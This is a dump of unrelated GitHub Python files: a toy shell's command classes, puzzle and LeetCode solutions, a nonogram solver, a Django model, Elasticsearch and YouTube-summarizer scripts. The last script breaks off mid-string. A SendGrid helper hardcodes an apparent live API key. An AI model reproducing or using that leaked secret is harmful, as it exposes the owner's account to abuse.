with open(file) as f:\n lines = f.readlines()\n for line in lines:\n if re.match(pattern, line):\n if len(files) > 1:\n match_string = (\n file +\n \":\" +\n line.replace(\"\\n\", \"\") + \"\\n\"\n )\n output.append(match_string)\n else:\n output.append(\n line.replace(\"\\n\", \"\")\n + \"\\n\"\n )\n\n return output\n\n\nclass Cut(Application):\n \"\"\"\n Cut implements the 'cut' shell function\n It cuts out sections from each line of a given file or stdin\n Outputs result to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n if len(args) != 3:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if args[0] != \"-b\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n\n bytes = args[1].split(\",\")\n indexs = []\n file = args[2]\n\n if \"#STDIN#\" in file:\n file = file[1]\n lines = file.split(\"\\n\")\n else:\n if not 
os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file) as f:\n lines = f.readlines()\n\n for byte in bytes:\n if \"-\" not in byte:\n if (int(byte) - 1) not in indexs:\n indexs.append(int(byte) - 1)\n elif byte[0] == \"-\":\n for i in range(0, int(byte[1:])):\n if i not in indexs:\n indexs.append(i)\n elif byte[-1] == \"-\":\n for i in range(int(byte[:-1]) - 1, len(max(lines, key=len))):\n if i not in indexs:\n indexs.append(i)\n else:\n indexRange = byte.split(\"-\")\n for i in range(int(indexRange[0]) - 1, int(indexRange[1])):\n if i not in indexs:\n indexs.append(i)\n\n indexs.sort()\n\n for line in lines:\n line = line.strip(\"\\n\")\n newLine = \"\"\n for i in indexs:\n if i < len(line):\n newLine = newLine + line[i]\n output.append(newLine + \"\\n\")\n\n return output\n\n\nclass Find(Application):\n \"\"\"\n Find implements the 'find' shell function\n It recursively searches for files with matching names\n Outputs list of relative paths, each followed by newline\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n initPathLength = len(os.getcwd())\n path = args[0]\n\n def recursive_find(path):\n files = os.listdir(path)\n for file in files:\n newPath = os.path.join(path, file)\n if args[0] != \"-name\":\n # outputs absolute path if directory is given at the start\n output.append(newPath + \"\\n\")\n elif args[0] == \"-name\":\n # replace absolute path with relative path if no dir given\n output.append(\".\" + newPath[initPathLength:] + \"\\n\")\n\n if os.path.isdir(newPath):\n recursive_find(newPath)\n\n # If no directory is given, use current working directory\n if args[0] == \"-name\":\n path = os.getcwd()\n if args[0] != \"-name\" and not os.path.exists(args[0]):\n self.raise_error(\n f\"Directory given does not exist: {args[0]}\",\n \"not_directory\",\n output\n )\n return output\n if \"-name\" not in args:\n recursive_find(path)\n if args[len(args) - 1] == \"-name\":\n self.raise_error(\n \"-name requires additional arguments\",\n \"type\",\n output\n )\n return output\n\n # If globbing wildcard is given, this runs instead.\n elif len(args) > 1:\n s = args[len(args) - 1]\n concPath = path + \"/**/\" + s\n files = glob.glob(concPath, recursive=True)\n if args[0] != \"-name\":\n for file in files:\n output.append(file + \"\\n\")\n elif args[0] == \"-name\":\n for file in files:\n output.append(\".\" + file[initPathLength:] + \"\\n\")\n\n return output\n\n\nclass Uniq(Application):\n \"\"\"\n Uniq implements the 'uniq' shell function\n It detects and deletes adjacent duplicate lines from an input file/stdin\n Outputs result to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n\n if len(args) > 2:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n file = args[0]\n case = 0\n if len(args) == 2:\n if args[0] != \"-i\":\n self.raise_error(\"Wrong flags\", \"value\", output)\n return output\n else:\n case = 1\n file = args[1]\n\n if \"#STDIN#\" in file:\n contents = []\n for lines in file[1:]:\n for line in lines.split(\"\\n\"):\n if line != \"\":\n contents.append(line)\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file, 
\"r\") as f:\n contents = f.read().splitlines()\n\n indexToRemove = []\n\n if case == 0:\n for i in range(0, len(contents) - 1):\n if contents[i] == contents[i + 1]:\n indexToRemove.append(i + 1)\n\n else:\n for i in range(0, len(contents) - 1):\n j = i\n while (\n (j + 1) < len(contents)\n and contents[j].lower() == contents[j + 1].lower()):\n if (j + 1) not in indexToRemove:\n indexToRemove.append(j + 1)\n j += 1\n\n indexToRemove.sort(reverse=True)\n\n for index in indexToRemove:\n contents.pop(index)\n\n for line in contents:\n output.append(line + \"\\n\")\n\n return output\n\n\n# TODO Implement sort from Robins branch\nclass Sort(Application):\n \"\"\"\n Sort implements the 'sort' shell function\n It sorts the contents of a file/stdin line by line\n Outputs results to stdout\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = unsafe\n\n def exec(self, args) -> List[str]:\n output = []\n\n rev = 0 # reverse order true/false\n if len(args) > 2:\n self.raise_error(\n \"Wrong number of command line arguments\",\n \"type\",\n output\n )\n return output\n if len(args) == 1:\n file = args[0]\n if len(args) == 2:\n if args[0] != \"-r\":\n self.raise_error(\n \"Wrong flags\",\n \"value\",\n output\n )\n return output\n else:\n rev = 1\n file = args[1]\n\n if \"#STDIN#\" in file:\n contents = []\n for lines in file[1:]:\n for line in lines.split(\"\\n\"):\n if line != \"\":\n contents.append(line)\n else:\n if not os.path.exists(file):\n self.raise_error(\n f\"No such file or directory: {file}\",\n \"file_not_found\",\n output\n )\n return output\n else:\n with open(file, \"r\") as f:\n contents = f.read().splitlines()\n\n contents.sort()\n if rev == 1:\n contents = contents[::-1]\n\n for line in contents:\n output.append(line + \"\\n\")\n\n return output\n","repo_name":"charliebarber/shell","sub_path":"src/applications/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":18704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5895460681","text":"#!/usr/bin/python3\nimport sys\nimport numpy as np\nfrom scipy.spatial.distance import cdist\n\ncoords = [tuple(int(s.strip()) for s in l.strip().split(','))\n for l in sys.stdin.readlines()]\nxmax = max(x for x, y in coords)\nymax = max(y for x, y in coords)\nshape = (xmax + 1, ymax + 1)\nR = max(*shape)\n\ngrid = np.zeros(shape, dtype=int)\n# this can't be the easiest way to do this...\nindices = np.asarray(list(np.ndindex(grid.shape)))\ndist = cdist(indices, coords, metric='cityblock')\ncost = np.sum(dist, axis=1)\n\nprint(np.count_nonzero(cost < 10000))\n","repo_name":"acarapetis/advent-of-code-2018","sub_path":"problem12.py","file_name":"problem12.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24210589112","text":"from sys import stdin\n\n\ndef exe(x):\n cou = 0\n l = []\n while cou < int(x):\n y = stdin.readline()\n z = stdin.readline()\n total_len = 0\n rope_len = z.split()\n\n i = 0\n for _ in rope_len:\n rope_len[i] = int(rope_len[i])\n i += 1\n\n for q in rope_len:\n total_len += q\n total_len -= 2\n\n l.append(total_len + 2)\n cou += 1\n\n for r in l:\n print(r)\n\nc = stdin.readline()\nexe(c)\n","repo_name":"ppkavinda/HacKerRank","sub_path":"ropes.py","file_name":"ropes.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 
+{"seq_id":"16059332472","text":"class Solution:\n def threeSumClosest(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n nums.sort()\n result = nums[0] + nums[1] + nums[2]\n\n for i in range(len(nums) - 2):\n j, k = i+1, len(nums) - 1\n while j < k:\n tmp_sum = nums[i] + nums[j] + nums[k]\n if tmp_sum == target:\n return tmp_sum\n\n if abs(tmp_sum - target) < abs(result - target):\n result = tmp_sum\n\n if tmp_sum < target:\n j += 1\n elif tmp_sum > target:\n k -= 1\n\n return result\n","repo_name":"alekfed/leetcode-solutions-python","sub_path":"0016.3sum-closest.py","file_name":"0016.3sum-closest.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34137662993","text":"#\n# @lc app=leetcode id=313 lang=python3\n#\n# [313] Super Ugly Number\n#\n# https://leetcode.com/problems/super-ugly-number/description/\n#\n# algorithms\n# Medium (42.59%)\n# Total Accepted: 65.3K\n# Total Submissions: 153.3K\n# Testcase Example: '12\\n[2,7,13,19]'\n#\n# Write a program to find the nth super ugly number.\n# \n# Super ugly numbers are positive numbers whose all prime factors are in the\n# given prime list primes of size k.\n# \n# Example:\n# \n# \n# Input: n = 12, primes = [2,7,13,19]\n# Output: 32 \n# Explanation: [1,2,4,7,8,13,14,16,19,26,28,32] is the sequence of the first\n# 12 \n# ⁠ super ugly numbers given primes = [2,7,13,19] of size 4.\n# \n# Note:\n# \n# \n# 1 is a super ugly number for any given primes.\n# The given numbers in primes are in ascending order.\n# 0 < k ≤ 100, 0 < n ≤ 106, 0 < primes[i] < 1000.\n# The nth super ugly number is guaranteed to fit in a 32-bit signed integer.\n# \n# \n#\n\n\n\nimport bisect\nfrom queue import PriorityQueue\nfrom collections import defaultdict, Counter\nimport heapq\nimport math\nfrom operator import mul\nfrom functools import reduce\nfrom itertools import count\nfrom pprint import pprint\n# from functools import lru_cache\nclass Solution:\n # def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:\n def nthSuperUglyNumber2(self, n: int, primes) -> int:\n\n l = [1]\n d = defaultdict(lambda: False)\n d[1] = True\n def recur(n):\n if n == 1:\n return 1\n else:\n last = recur(n-1)\n for p in primes:\n num = p*last\n if num > l[-1]:\n l.append(num)\n d[num] = True\n else:\n if not d[num]:\n bisect.insort_left(l, num)\n d[num] = True\n # break\n # print(l)\n return l[n-1]\n return recur(n)\n\n\n\n def nthSuperUglyNumber1(self, n: int, primes) -> int:\n\n pq = []\n d = defaultdict(lambda: False)\n heapq.heappush(pq, 1)\n d[1] = True\n for i in range(0, n):\n num = heapq.nsmallest(i+1, pq)[-1]\n for p in primes:\n r = p*num\n if not d[r]:\n # print(pq)\n heapq.heappush(pq, r)\n d[r] = True\n # print(sorted(pq))\n return heapq.nsmallest(n, pq)[-1]\n\n\n\n def nthSuperUglyNumber(self, n: int, primes) -> int:\n pq = []\n d = defaultdict(lambda: False)\n pq = [1]\n d[1] = True\n for i in range(0, n):\n for p in primes:\n r = p*pq[i]\n if not d[r]:\n if r > pq[-1]:\n pq.append(r)\n else:\n bisect.insort_left(pq, r)\n d[r] = True\n return pq[n-1]\n\n\n\n \n\n # for i in range(1,13):\n # print(next(hq2(i)))\n # print(next(hq2(12)))\n\n\n # return hq2(n)\n\n\n def nthSuperUglyNumber3(self, n: int, primes) -> int:\n base = primes[0]\n m = list(map(lambda x: math.log(x, base), primes))\n # print('m=', m)\n l = list(zip(m, range(len(primes))))\n template = []\n\n # pq = PriorityQueue()\n pq = []\n # 
heapq.heappush(pq, 1)\n\n\n for v,k in l:\n t = [0]*len(primes)\n t[k]=1\n template.append(t)\n heapq.heappush(pq, (v,t)) \n\n # print(template)\n\n\n\n def get_new_kv(l):\n # print('get_new_kv')\n i = -1\n me = values[i]\n k = ks[i]\n # print(values, me)\n # print(ks)\n temp = []\n while me + values[i-1]>me:\n temp.append((me + values[i-1],[a+b for a,b in zip(k, ks[i-1])]))\n i -= 1\n # print('temp=', temp)\n for v,k in temp:\n heapq.heappush(pq, (v,k))\n # print(sorted(pq))\n\n l = [1]\n c = 1\n values = [0]\n ks = []\n\n\n multiples_of_primes = []\n\n def add_to_multiples_of_primes(start):\n for i in range(len(m)):\n multiples_of_primes.append((start*m[i], [t*start for t in template[i]]))\n\n ct = count(2)\n # print(pq)\n while c < n:\n if pq:\n v, k = heapq.heappop(pq)\n else:\n # print('here', multiples_of_primes)\n v, k = multiples_of_primes.pop(0)\n\n\n temp_v = v\n\n if not multiples_of_primes:\n add_to_multiples_of_primes(next(ct))\n\n while multiples_of_primes[0][0] < temp_v:\n sv, sk = multiples_of_primes.pop(0)\n # print('here', sv, si)\n # print(len(multiples_of_primes))\n if not multiples_of_primes:\n add_to_multiples_of_primes(next(ct))\n values.append(sv)\n ks.append(sk)\n item = reduce(mul, (p**i for p, i in zip(primes, sk) if i != 0))\n l.append(item)\n c += 1\n get_new_kv(l)\n temp_v = sv\n if c == n:\n # print('here')\n break\n # print('l=', l,c)\n values.append(v)\n ks.append(k)\n item = reduce(mul, (p**i for p, i in zip(primes, k) if i != 0))\n if item > l[-1]:\n l.append(item)\n c += 1\n get_new_kv(l)\n # print('l=', l)\n return l[-1]\n\n\n\n def nthSuperUglyNumber2(self, n: int, primes) -> int:\n\n\n debug = False\n # debug = True\n\n\n table = [[0]*len(primes) for _ in range(n)]\n \n table[0] = [1]*len(primes)\n\n def fill(r, c): \n val = primes[c] * l[r-1]\n max_col[c] = val, r, c\n return val\n\n # pprint(table)\n c = 1\n \n max_col = list(zip(primes, [0]*len(primes), range(len(primes))))\n # print(max_col)\n l = [1]\n \n\n\n pq = PriorityQueue()\n\n for i, v in enumerate(primes):\n pq.put((v, i))\n\n\n\n # pq.put((0, primes[0]))\n\n\n\n mx = primes[0]\n cr, cl = 0, 0\n\n\n\n\n\n\n\n while c < n:\n # current row, current col\n\n \n \n mx, cl = pq.get()\n cr = max_col[cl][1]\n\n if debug:\n # print('max_col=', max_col)\n print('cr=', cr, 'cl=', cl, 'mx=', mx)\n # print(' pk=', pk, 'pv=', pv)\n\n\n if cl == 0:\n\n # if primes[cl] * table[cr][cl] <= mx:\n if primes[cl] * table[cr][cl] == mx:\n if debug:\n print('cr=', cr, 'cl=', cl)\n print(primes[cl] * table[cr][cl], mx, primes[cl] * table[cr][cl] == mx)\n cr += 1\n table[cr][cl] = primes[cl] * table[cr-1][cl]\n max_col[cl] = table[cr][cl], cr, cl\n\n if table[cr][cl] > l[-1]:\n if debug:\n print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n\n\n\n else:\n\n if cl < len(primes)-1:\n \n # if primes[cl] * l[cr] <= mx:\n if primes[cl] * l[cr] == mx:\n if debug:\n print('cr=', cr, 'cl=', cl)\n print(primes[cl] * l[cr], mx, primes[cl] * l[cr] == mx)\n\n cr += 1\n table[cr][cl] = fill(cr,cl)\n if table[cr][cl] > l[-1]:\n if debug:\n print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n\n else:\n if debug:\n print('last column')\n\n cr += 1\n table[cr][cl] = fill(cr,cl)\n if table[cr][cl] > l[-1]:\n if debug: print(table[cr][cl], 'added to l')\n l.append(table[cr][cl])\n c += 1\n \n\n # if debug: pprint(table)\n\n if cl == 0:\n mx = max_col[cl][0] * primes[0]\n else:\n mx = primes[cl] * l[max_col[cl][1]]\n # print('mx=', mx, max_col[cl])\n\n pq.put((mx, cl))\n \n \n\n if debug:\n 
print(l,c)\n print(\"=\"*30)\n\n\n return l[-1]\n\n def nthSuperUglyNumber_final(self, n: int, primes) -> int:\n lp = len(primes)\n indices = [0]*lp\n l = [1]*n\n pq = list(zip(primes, range(lp)))\n heapq.heapify(pq)\n c, mx = 1, 1\n while c < n:\n val, i = heapq.heappop(pq)\n indices[i] += 1\n if val > mx:\n l[c] = val\n mx = val\n c += 1\n if i == 0:\n val *= primes[i]\n else:\n val = primes[i] * l[indices[i]]\n heapq.heappush(pq, (val, i))\n return l[-1]\n\ns = Solution()\n\n\nimport time\n\nstart = time.time()\n# print(\"hello\")\n\nn = 12\nprimes = [2,7,13,19]\nprint(s.nthSuperUglyNumber(n, primes)==32)\n\n\nn = 100000\n# n = 300\nprimes = [7,19,29,37,41,47,53,59,61,79,83,89,101,103,109,127,131,137,139,157,167,179,181,199,211,229,233,239,241,251]\na = s.nthSuperUglyNumber(n, primes)\nprint(a)\n# b = s.nthSuperUglyNumber2(n, primes)\n# print(a == 1092889481)\n# print(b)\n# print(a==b)\n\n\n\n\n\n\n# print()\nn = 35\nprimes = [2,3,11,13,17,23,29,31,37,47]\n# print(s.nthSuperUglyNumber(n, primes) == 62) # 62\n\n\n\nn = 4\nprimes = [2,3,5]\nprint(s.nthSuperUglyNumber(n, primes) == 4)\n\n\nn = 3\nprimes = [2]\nprint(s.nthSuperUglyNumber(n, primes) == 4)\n\n\n\nend = time.time()\nprint(end - start)\n\n\n\n\n\n\n\n\n\n\n\n \n","repo_name":"nickyfoto/lc","sub_path":"python/313.super-ugly-number.py","file_name":"313.super-ugly-number.py","file_ext":"py","file_size_in_byte":10136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24800562702","text":"import sys\ninput = sys.stdin.readline\n\n\nn = int(input())\nm = int(input())\na = list(map(int, input().split()))\nphoto = dict()\n\nfor i in range(m):\n\n if a[i] in photo:\n photo[a[i]][0] += 1\n else:\n if len(photo) == n:\n del photo[a[sorted(photo.values())[0][1]]]\n photo[a[i]] = [1, i]\n\nprint(' '.join(map(str, sorted(photo.keys()))))\n","repo_name":"JUNGJUNSEO/baekjun","sub_path":"백준/1713_후보 추천하기_220511.py","file_name":"1713_후보 추천하기_220511.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7778845259","text":"from functools import reduce, lru_cache\nfrom random import choice, shuffle, randrange, randint\nfrom collections import deque\nfrom queue import PriorityQueue\n#min of hamming distances between all 01 sentences with d-ones\n\nwith open(\"zad_input.txt\") as f:\n inp = [[int(c) for c in row.split(\" \") if c] for row in f.read().split(\"\\n\") if row]\n [K,M] = inp[0]\n rows = inp[1:K+1]\n columns = inp[-M:]\n\ndef transpose(matrix):\n return [[matrix[a][b] for a in range(len(matrix))] for b in range(len(matrix[0]))]\n\ndef generate_all(n,a):\n if n <= 0:\n if not a:\n return [[]]\n else:\n return []\n if not a:\n return [[0]*n]\n [a1, *at] = a\n return [[0]*i + [1]*a1 + ([0] if at else []) + other for i in range(0, n) for other in generate_all(n-a1-i-(1 if at else 0), at) if len([0]*i + [1]*a1 + ([0] if at else []) + other) == n]\n\ndef solve(row_values, column_values):\n\n def allowable(row):\n def _and_pixel(x,y):\n return x if x == y else 2\n return reduce(lambda a, b: [_and_pixel(x,y) for x, y in zip(a, b)], row)\n\n def show(m):\n return \"\\n\".join(\"\".join(\".#?\"[i] for i in x) for x in m)\n\n w, h = len(column_values), len(row_values)\n rows = [generate_all(w, x) for x in row_values]\n cols = [generate_all(h, x) for x in column_values]\n can_do = [allowable(row) for row in rows]\n\n def _can_fit(x,y):\n return x == y or x == 2 or y == 2\n\n def fits(a, b):\n 
return all(_can_fit(x,y) for x, y in zip(a, b))\n\n def fix_col(n):\n c = [x[n] for x in can_do]\n cols[n] = [x for x in cols[n] if fits(x, c)]\n for i, x in enumerate(allowable(cols[n])):\n if x != can_do[i][n]:\n fillable_rows.add(i)\n can_do[i][n] = x if _can_fit(x, can_do[i][n]) else 2\n\n def fix_row(n):\n c = can_do[n]\n rows[n] = [x for x in rows[n] if fits(x, c)]\n for i, x in enumerate(allowable(rows[n])):\n if x != can_do[n][i]:\n fillable_cols.add(i)\n can_do[n][i] = x if _can_fit(x, can_do[n][i]) else 2\n\n fillable_rows, fillable_cols = set(), set(range(w))\n\n while fillable_cols:\n for i in fillable_cols:\n fix_col(i)\n fillable_cols = set()\n for i in fillable_rows:\n fix_row(i)\n fillable_rows = set()\n\n return show(can_do)\n\n\ndef print_board(board):\n return \"\\n\".join([\"\".join(map(str,row)) for row in board])\n\nwith open(\"zad_output.txt\", mode='w') as f:\n f.write(solve(rows,columns))\n","repo_name":"wekt0r/uni","sub_path":"Sztuczna Inteligencja/p3/z1.py","file_name":"z1.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9372425379","text":"import requests\n\nAPI_KEY = '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'\n\ndef send(destination, subject, message):\n\n post = requests.post(\n \"https://api.sendgrid.com/v3/mail/send\",\n headers={\n \"Authorization\": \"Bearer \" + API_KEY,\n \"Content-Type\": \"application/json\"\n },\n json = {\n \"personalizations\": [ {\n \"to\": [ { \"email\": destination } ],\n \"subject\": subject\n } ],\n\n \"from\": {\n \"email\": \"rotafestival@gmail.com\",\n \"name\": \"ROTA - Festival de Roteiro Audiovisual\"\n },\n\n \"content\": [ {\n \"type\": \"text/html\",\n \"value\": message\n } ]\n }\n\n )\n\n","repo_name":"1um0zero/rota","sub_path":"src/core/sendgrid.py","file_name":"sendgrid.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20855462593","text":"from django.db import models\nfrom users.models import BaseUser\n\n# Create your models here.\n\n\n\nclass Message(models.Model):\n \"\"\" Class that is the framework for all messages that get registered into the database\n\n \"\"\"\n\n from_user = models.ForeignKey(BaseUser, null=True, related_name='creator')\n to_user = models.ForeignKey(BaseUser, null=True, related_name='receiver')\n subject_line = models.CharField(('Subject'), max_length=140, blank=True,)\n\n is_read = models.BooleanField(('Read'), default=False)\n\n body_text = models.CharField(('Body'), max_length=1000, blank=True,)\n\n def setAsRead(self):\n \"\"\" Flips the is_read boolean to determine if the message has been seen/read yet\n\n :return: n/a\n \"\"\"\n self.is_read = True","repo_name":"Gr34v0/DogeIncToolShare","sub_path":"messaging/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69999824009","text":"import os\nimport pandas as pd\nfrom shapely.geometry import Point, Polygon\nfrom elasticsearch_config import es\nfrom elasticsearch.helpers import bulk\nfrom multiprocessing import Process, Manager\nimport time\n\nstart_time = time.time()\n\n# ---------- CREAR INDEX OG FIELD PRICES ----------\n\nog_mapp = es.indices.get_mapping(index=\"wells_coordinates_texas\")[\n 
\"wells_coordinates_texas\"\n]\n\nog_mapp[\"mappings\"][\"properties\"][\"geology_type\"] = {\n \"type\": \"text\",\n \"fields\": {\"keyword\": {\"type\": \"keyword\", \"ignore_above\": 256}},\n}\n\n\nes.indices.create(index=\"well_geology\", body=og_mapp, ignore=400)\n\n# ---------- IDENTIFICAR TIPO DE GEOLOGIA ----------\n\ngeology_index = \"tx_geol_poly\"\nwell = \"wells_coordinates_texas\"\nquery = {\"query\": {\"match_all\": {}}}\nindex_geology_hits = []\nwell_hits = []\n\n\ndef get_batch_data(index, data):\n res = es.search(index=index, body=query, size=10000, scroll=\"2m\")\n scroll_id = res[\"_scroll_id\"]\n hits = res[\"hits\"][\"hits\"]\n data.extend(hit[\"_source\"] for hit in hits)\n\n while len(hits) > 0:\n res = es.scroll(scroll_id=scroll_id, scroll=\"2m\")\n scroll_id = res[\"_scroll_id\"]\n hits = res[\"hits\"][\"hits\"]\n data.extend(hit[\"_source\"] for hit in hits)\n\n\ndef process_geology_hits():\n get_batch_data(geology_index, index_geology_hits)\n polygons = []\n\n for hit in index_geology_hits:\n coordinates = hit[\"geometry\"][\"coordinates\"][0]\n polygons.append(Polygon(coordinates))\n\n return polygons\n\n\ndef process_well_hit(well_hit, polygons, index_geology_hits, result):\n well_location = Point(*well_hit[\"geometry\"])\n for i, polygon in enumerate(polygons):\n if well_location.within(polygon):\n well_hit[\"geology_type\"] = index_geology_hits[i][\"GENERALIZE\"]\n result.append(well_hit)\n\n\ndef process_well_hits(well_hits, polygons, index_geology_hits, result):\n for well_hit in well_hits:\n process_well_hit(well_hit, polygons, index_geology_hits, result)\n\n\nif __name__ == \"__main__\":\n manager = Manager()\n result = manager.list()\n\n get_batch_data(well, well_hits)\n polygons = process_geology_hits()\n\n chunk_size = max(len(well_hits) // 10, 1)\n processes = []\n\n for i in range(0, len(well_hits), chunk_size):\n process = Process(\n target=process_well_hits,\n args=(well_hits[i : i + chunk_size], polygons, index_geology_hits, result),\n )\n processes.append(process)\n process.start()\n\n for process in processes:\n process.join()\n\n def ingestion_bulk(index_name, batch_size=5000):\n data = [{\"_index\": index_name, \"_source\": doc} for doc in result]\n len_data = len(data)\n\n for i in range(0, len_data, batch_size):\n success, failed = bulk(es, data[i : i + batch_size])\n\n if failed:\n print(f\"Error al indexar {failed} documentos.\")\n else:\n print(f\"Se indexaron los documentos correctamente.\")\n\n ingestion_bulk(\"well_geology\")\n\n end_time = time.time()\n all_time = end_time - start_time\n\n print(f\"Tiempo de procesamiento: {float(all_time) / 60} minutos.\")\n","repo_name":"CristianERP/elastic","sub_path":"well_geology_parallel.py","file_name":"well_geology_parallel.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1620154821","text":"import openai\nimport pandas as pd\nfrom pytube import YouTube\nfrom transformers import T5Tokenizer\nfrom transformers import T5Tokenizer, T5ForConditionalGeneration\nfrom transformers import GPT2TokenizerFast\nfrom transformers import pipeline\nimport textwrap\nfrom concurrent.futures import ThreadPoolExecutor\nimport logging\nimport warnings\nimport yt_dlp\nimport os\n# Supress warnings\nlogging.basicConfig(level=logging.CRITICAL)\nwarnings.filterwarnings(\"ignore\")\n\n# OpenAI API key\nopenai.api_key = \"Your OpenAI API Key\"\n\ndef get_transcript(youtubelink):\n video_url = youtubelink\n\n # 
Create a yt-dlp instance\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'extractaudio': True,\n 'audioformat': 'mp3',\n 'outtmpl': 'audio_file.mp3',\n 'noplaylist': True,\n }\n with yt_dlp.YoutubeDL(ydl_opts) as ydl:\n # Extract video information\n video_info = ydl.extract_info(video_url, download=False)\n # Download the audio\n ydl.download([video_url])\n\n audio_file = \"audio_file.mp3\"\n\n \n\n with open(audio_file, \"rb\") as audio:\n transcript = openai.Audio.translate(\"whisper-1\", audio)\n\n thetext = transcript['text']\n\n with open(\"full_transcript.txt\", \"w\") as file:\n file.write(thetext)\n\n # Remove the audio file after processing\n os.remove(audio_file)\n\n return thetext\n\n\n\ndef count_tokens(input_data, max_tokens=20000, input_type='text'):\n tokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\")\n \n if input_type == 'text':\n tokens = tokenizer.tokenize(input_data)\n elif input_type == 'tokens':\n tokens = input_data\n else:\n raise ValueError(\"Invalid input_type. Must be 'text' or 'tokens'\")\n\n # Print the number of tokens\n token_count = len(tokens)\n return token_count\n\n\n\ndef truncate_text_by_tokens(text, max_tokens=3000):\n tokenizer = GPT2TokenizerFast.from_pretrained(\"gpt2\")\n \n # Tokenize the input text\n tokens = tokenizer.tokenize(text)\n\n # Truncate tokens to final_max_tokens\n truncated_tokens = tokens[:max_tokens]\n\n trunc_token_len = count_tokens(truncated_tokens, input_type='tokens')\n\n print(\"Truncated Summary Token Length:\"+ str(trunc_token_len))\n\n # Convert the truncated tokens back to text\n truncated_text = tokenizer.convert_tokens_to_string(truncated_tokens)\n\n return truncated_text\n\n\n\ndef summarize_chunk(classifier, chunk):\n summary = classifier(chunk)\n return summary[0][\"summary_text\"]\n\n\n\ndef summarize_text(text, model_name=\"t5-small\", max_workers=8):\n classifier = pipeline(\"summarization\", model=model_name)\n summarized_text = \"\"\n\n # Split the input text into smaller chunks\n chunks = textwrap.wrap(text, width=500, break_long_words=False)\n\n # Parallelize the summarization of the chunks\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n summaries = executor.map(lambda chunk: summarize_chunk(classifier, chunk), chunks)\n summarized_text = \" \".join(summaries)\n text_len_in_tokens = count_tokens(text)\n print(\"Tokens in full transcript\" + str(text_len_in_tokens))\n summary_token_len = count_tokens(summarized_text)\n print(\"Summary Token Length:\"+ str(summary_token_len))\n\n if summary_token_len > 2500:\n summarized_text = truncate_text_by_tokens(summarized_text, max_tokens=2500)\n\n else:\n summarized_text = summarized_text\n\n\n with open(\"transcript_summary.txt\", \"w\") as file:\n file.write(summarized_text)\n\n\n print(\"summarized by t5\")\n return summarized_text.strip()\n\n\n\ndef gpt_summarize_transcript(transcript_text,token_len):\n # Check the length of the transcript\n \n # Generate the summary using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at summarizing long documents into concise and comprehensive summaries. Your summaries often capture the essence of the original text.\"},\n {\"role\": \"user\", \"content\": \"I have a long transcript that I would like you to summarize for me. 
Please think carefully and do the best job you possibly can.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a concise and comprehensive summary of the transcript.\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text}\n ],\n max_tokens=3800 - token_len,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the generated summary from the response\n summary = response['choices'][0]['message']['content']\n print(\"summarized by GPT3\")\n\n with open(\"transcript_summary.txt\", \"w\") as file:\n file.write(summary)\n\n\n # Return the summary\n return summary.strip()\n \n\n\ndef generate_tweet_thread(transcript_text):\n # Generate the tweets using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing tweet threads that are incredibly interesting and potentially newsworthy. You are known to go viral.\"},\n {\"role\": \"user\", \"content\": \"I have text that I would like you to use as the basis for coming up with multiple tweets for a long-form twitter thread. Please think step by step and do the best job you possibly can. Each tweet should be on a new line\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a list of tweets on new lines for easy parsing. This tweet thread should be written to go 